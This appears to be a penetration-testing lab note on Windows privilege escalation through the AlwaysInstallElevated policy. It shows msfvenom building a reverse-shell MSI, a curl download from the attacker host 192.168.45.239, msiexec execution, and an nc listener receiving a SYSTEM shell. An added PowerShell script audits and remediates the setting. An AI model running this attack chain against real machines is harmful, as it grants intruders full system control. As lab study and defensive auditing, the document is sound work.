Priv Esc

PS C:\Shenzi> reg query HKCU\Software\Policies\Microsoft\Windows\Installer
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.239 LPORT=1337 -f msi -o pwned.msi
PS C:\programdata> curl 192.168.45.239/pwned.msi -o pwned.msi
PS C:\programdata> msiexec /i pwned.msi
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.177.55] 50544
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nt authority\system
67a413a96b7e358d160a17435865b709

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.177.55
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.177.254
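
Added audit example, not part of the original notes: the Installer policy key queried at the top holds the AlwaysInstallElevated value, which lets msiexec run packages as SYSTEM only when it is 1 in both HKLM and the user's hive. This PowerShell check reports that state for every loaded user hive; the function names are hypothetical.

```powershell
# Added example (not from the original notes): audit AlwaysInstallElevated.
# Function names are hypothetical; run from an elevated prompt to see all hives.
$subKey = 'Software\Policies\Microsoft\Windows\Installer'

function Get-InstallerElevationValue {
    param([string]$RegPath)
    # Returns the AlwaysInstallElevated DWORD, or 0 when the key or value is absent.
    $item = Get-ItemProperty -Path $RegPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $machine = Get-InstallerElevationValue "HKLM:\$subKey"
    # Walk every loaded user hive (HKEY_USERS\<SID>), not only the current user.
    $users = Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }
    foreach ($u in $users) {
        $user = Get-InstallerElevationValue "Registry::HKEY_USERS\$($u.PSChildName)\$subKey"
        [pscustomobject]@{
            Sid          = $u.PSChildName
            MachineValue = $machine
            UserValue    = $user
            # The policy takes effect only when both hives hold 1.
            Elevated     = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

Test-AlwaysInstallElevated | Format-Table -AutoSize

# Remediation: clear the value in both hives (or set the matching Group Policy
# setting, "Always install with elevated privileges", to Disabled).
# Remove-ItemProperty -Path "HKLM:\$subKey" -Name AlwaysInstallElevated
# Remove-ItemProperty -Path "HKCU:\$subKey" -Name AlwaysInstallElevated
```

Any row with Elevated = True means a standard user under that SID can install an MSI with SYSTEM rights, as the session above shows.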
